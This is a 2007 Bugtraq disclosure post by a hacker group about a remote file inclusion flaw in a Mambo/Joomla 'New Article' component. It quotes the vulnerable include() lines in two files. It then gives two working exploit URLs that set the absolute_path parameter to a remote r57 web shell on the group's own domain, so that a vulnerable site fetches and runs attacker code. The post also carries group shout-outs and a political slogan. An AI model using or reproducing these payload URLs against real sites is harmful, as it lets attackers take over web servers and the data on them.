
Date: 15 Apr 2007 13:58:07 -0000
From: meftun@...tunnet.com
To: bugtraq@...urityfocus.com
Subject: Mambo/Joomla Component New Article Component  RFI

=================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple 
RFI
=================================================
Found By : C-W-M 
Special Thnx ; Eskobar, Poizonb0x, eno7, DoubleKickx
=================================================
Homepage: www.meftunnet.com , www.hackersecurity.org
Turkish Hacker Security Group
=======================================================
Script Site : 
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.php');     <= 
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://meftunnet.com/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.php');     <= Line 
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://meftunnet.com/r57.txt?
=========================================================


#Long Life Palestine
#www.HackerSecurity.Org & www.meftunnet.com
